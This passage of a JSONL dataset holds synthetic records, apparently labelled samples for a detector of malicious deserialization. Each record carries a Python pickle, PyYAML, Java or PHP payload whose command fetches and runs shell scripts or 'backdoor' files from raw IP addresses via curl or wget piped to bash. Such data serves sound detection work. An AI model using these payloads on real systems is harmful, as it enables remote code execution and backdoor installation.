'/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00294", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('zaZZLgsaQGOmRSIP4+y5yFifcyfRvnBSAk3tH9GNpUuxr0U5Ejc3hdkLH6fX')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://136.95.249.169/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('zaZZLgsaQGOmRSIP4+y5yFifcyfRvnBSAk3tH9GNpUuxr0U5Ejc3hdkLH6fX')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00295", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('Ks0ZrgfSUSLIjNBW7dP3kNzFM3X1/AzP+V31p2gz/9VeK9CQR1Zu5UVTEQee')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://148.227.27.193/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('Ks0ZrgfSUSLIjNBW7dP3kNzFM3X1/AzP+V31p2gz/9VeK9CQR1Zu5UVTEQee')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00296", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://251.45.72.163/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://251.45.72.163/shell\")"}}]} {"id": "synth_malicious_deserialization_00297", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('f/Ifd4iE6rbJ7PSq+KNRN4aybRHGrTra110NAjutK0Bm8P77jOmwWwis+UGY')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://195.17.47.45/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('f/Ifd4iE6rbJ7PSq+KNRN4aybRHGrTra110NAjutK0Bm8P77jOmwWwis+UGY')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00298", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('Qo1fuRKJZJEe1zM8tRFeFujIsk1F0cvVMScGhdpwA2u6GFby9HKFXx1Zmsjp')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://152.72.33.225/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('Qo1fuRKJZJEe1zM8tRFeFujIsk1F0cvVMScGhdpwA2u6GFby9HKFXx1Zmsjp')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00299", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('KpyltRa2J56CJvVOo9dzlS9uC6PI0cW9egUA7pOS048DzReYCI/7/gILmeSi')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://121.223.199.185/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('KpyltRa2J56CJvVOo9dzlS9uC6PI0cW9egUA7pOS048DzReYCI/7/gILmeSi')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00300", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('/JmxRLBT91DFagwn1wusNZlwfgIP5QBqJuao1PAh5gDrUUsbtGTErwxv60bn')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://191.44.3.199/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('/JmxRLBT91DFagwn1wusNZlwfgIP5QBqJuao1PAh5gDrUUsbtGTErwxv60bn')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00301", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('bQXLKTEMvmvW+Ml8jAtzN+encF8D4ybV+fu1hx42IdBYnWUK4m46pbBR/NT5')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://40.27.239.81/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('bQXLKTEMvmvW+Ml8jAtzN+encF8D4ybV+fu1hx42IdBYnWUK4m46pbBR/NT5')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00302", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://29.49.112.212/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://111.232.60.208/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://29.49.112.212/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://111.232.60.208/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00303", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:50:\"016cpYIWRzpfNMhsUJSPdk/18pgfvu4IlYeNhix3\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://163.13.59.134/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:50:\"016cpYIWRzpfNMhsUJSPdk/18pgfvu4IlYeNhix3\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://163.13.59.134/bd\")"}}]} {"id": "synth_malicious_deserialization_00304", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://201.216.162.228/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://110.248.166.132/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://201.216.162.228/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://110.248.166.132/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00305", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://227.63.201.186/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://154.197.140.122/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://227.63.201.186/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://154.197.140.122/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00306", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://54.196.255.151/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://54.196.255.151/shell\")"}}]} {"id": "synth_malicious_deserialization_00307", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:40:\"/Hwfd4IEKSVt4+ti0Vn2UcUCnYthDes08kY+MY0h\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://200.83.52.197/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:40:\"/Hwfd4IEKSVt4+ti0Vn2UcUCnYthDes08kY+MY0h\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://200.83.52.197/bd\")"}}]} {"id": "synth_malicious_deserialization_00308", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('MZVwjpBDu8DzqQi4X6VaCbOhspnrSvTXyRsEKbOnxDVU1b1iNjWUvQCvU0kz')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://151.161.181.130/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('MZVwjpBDu8DzqQi4X6VaCbOhspnrSvTXyRsEKbOnxDVU1b1iNjWUvQCvU0kz')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00309", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:35:\"P0pP89c9tE6JHXHan6P/nzAgCHEj/zwdIIRkZj8z\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://158.213.162.109/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:35:\"P0pP89c9tE6JHXHan6P/nzAgCHEj/zwdIIRkZj8z\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://158.213.162.109/bd\")"}}]} {"id": "synth_malicious_deserialization_00310", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('yoyr4Up6hS7zhMPgUxOeapbFwzIggDtH3MFeUWjEBnybEemDd9AWmVcZgFbb')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://34.245.215.187/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('yoyr4Up6hS7zhMPgUxOeapbFwzIggDtH3MFeUWjEBnybEemDd9AWmVcZgFbb')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00311", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:53:\"ylmNMhGE/4/PPOe2t86sdJTNvVYhn2F48Rc8FC2Q\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://139.199.105.3/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:53:\"ylmNMhGE/4/PPOe2t86sdJTNvVYhn2F48Rc8FC2Q\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://139.199.105.3/bd\")"}}]} {"id": "synth_malicious_deserialization_00312", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:71:\"3646m7Ke9DFSqlb6JsOIPFob9GqcrlUVeZWAuw86\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://226.143.39.90/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:71:\"3646m7Ke9DFSqlb6JsOIPFob9GqcrlUVeZWAuw86\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://226.143.39.90/bd\")"}}]} {"id": "synth_malicious_deserialization_00313", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://131.37.68.119/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://131.37.68.119/shell\")"}}]} {"id": "synth_malicious_deserialization_00314", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('/gNof1ZCjF8bDdFpnVzHEsEgZ3tPaRV6GqQfmeR82uSluz4Ia9UMQf0ufx20')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://143.199.2.231/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('/gNof1ZCjF8bDdFpnVzHEsEgZ3tPaRV6GqQfmeR82uSluz4Ia9UMQf0ufx20')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00315", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:22:\"KdWwhhxUD4bB5MyI/0I9LgfiyupYiwe1zrfE6BN1\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://138.16.219.252/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:22:\"KdWwhhxUD4bB5MyI/0I9LgfiyupYiwe1zrfE6BN1\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://138.16.219.252/bd\")"}}]} {"id": "synth_malicious_deserialization_00316", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:36:\"QcBvC/Y+qc2A8bYRFd7jFHUpBYPvvNU+8UvB5jBQ\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://184.104.143.98/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:36:\"QcBvC/Y+qc2A8bYRFd7jFHUpBYPvvNU+8UvB5jBQ\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://184.104.143.98/bd\")"}}]} {"id": "synth_malicious_deserialization_00317", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://51.229.177.47/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://10.17.191.85/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://51.229.177.47/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://10.17.191.85/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00318", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://100.100.58.105/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://75.199.168.183/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://100.100.58.105/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://75.199.168.183/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00319", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:33:\"j8TJQsQfDpH+bab+7vtC5FQ24ewLlaeTosHs+Qem\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://14.220.21.58/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:33:\"j8TJQsQfDpH+bab+7vtC5FQ24ewLlaeTosHs+Qem\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://14.220.21.58/bd\")"}}]} {"id": "synth_malicious_deserialization_00320", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:53:\"/gsamgkXVwQ78KnY+XG/dTdTLPkmLrvHWo7Tv5iJ\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://70.249.115.140/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:53:\"/gsamgkXVwQ78KnY+XG/dTdTLPkmLrvHWo7Tv5iJ\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://70.249.115.140/bd\")"}}]} {"id": "synth_malicious_deserialization_00321", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:22:\"f/GorvSGfSAj+3JINO+UXRb3TRDyDziyc5vLYwil\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://129.21.156.72/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:22:\"f/GorvSGfSAj+3JINO+UXRb3TRDyDziyc5vLYwil\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://129.21.156.72/bd\")"}}]} {"id": "synth_malicious_deserialization_00322", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://86.214.247.4/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://86.214.247.4/shell\")"}}]} {"id": "synth_malicious_deserialization_00323", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://3.18.209.168/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://3.18.209.168/shell\")"}}]} {"id": "synth_malicious_deserialization_00324", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('tjHPsEFp7EOgNqd7IWtK5jCxkS6rVnaRX93oJzHvJVMrRaXsW0gMSySdtFbb')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://206.237.186.237/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('tjHPsEFp7EOgNqd7IWtK5jCxkS6rVnaRX93oJzHvJVMrRaXsW0gMSySdtFbb')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00325", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:51:\"AU7al/y4o9/m2mRLXCLZ3tPZTxheNU7fefN92DLo\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://3.28.75.240/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:51:\"AU7al/y4o9/m2mRLXCLZ3tPZTxheNU7fefN92DLo\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://3.28.75.240/bd\")"}}]} {"id": "synth_malicious_deserialization_00326", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:63:\"/n+ptHa0ZoXGx8QgXOn4ValbhGjmnhtWQpXuESA+\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://9.246.81.146/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:63:\"/n+ptHa0ZoXGx8QgXOn4ValbhGjmnhtWQpXuESA+\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://9.246.81.146/bd\")"}}]} {"id": "synth_malicious_deserialization_00327", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:24:\"YsS2trI5LlidzfOBITkx6MSa7FT2SCmPthJD5M+b\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://3.180.212.60/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:24:\"YsS2trI5LlidzfOBITkx6MSa7FT2SCmPthJD5M+b\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://3.180.212.60/bd\")"}}]} {"id": "synth_malicious_deserialization_00328", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://51.45.85.74/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://51.45.85.74/shell\")"}}]} {"id": "synth_malicious_deserialization_00329", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://103.201.208.252/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://139.111.161.30/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://103.201.208.252/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://139.111.161.30/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00330", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('NluNVdjKKwLc+wAO9JS0HCzo54qI7ElbsZ43mTamd7KbuHO9Yv1iBVElKCGk')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://206.64.142.213/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('NluNVdjKKwLc+wAO9JS0HCzo54qI7ElbsZ43mTamd7KbuHO9Yv1iBVElKCGk')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00331", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://85.98.103.85/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://108.52.148.138/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://85.98.103.85/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://108.52.148.138/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00332", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://210.141.146.157/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://85.96.6.56/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://210.141.146.157/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://85.96.6.56/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00333", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('ssfOIA92c4qyhuIvdjj6/xIgfTGOHiTpBR/mfrkQUs+5NtslQrD/95zrf9i3')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://217.151.63.227/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('ssfOIA92c4qyhuIvdjj6/xIgfTGOHiTpBR/mfrkQUs+5NtslQrD/95zrf9i3')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00334", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:51:\"eqSHfd2MpjBpm02ibR4vfwzot2qudisOq4YNmtrZ\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://168.20.67.252/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:51:\"eqSHfd2MpjBpm02ibR4vfwzot2qudisOq4YNmtrZ\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://168.20.67.252/bd\")"}}]} {"id": "synth_malicious_deserialization_00335", "source": "synthetic", "source_license": "generated", "text": "# Cache file 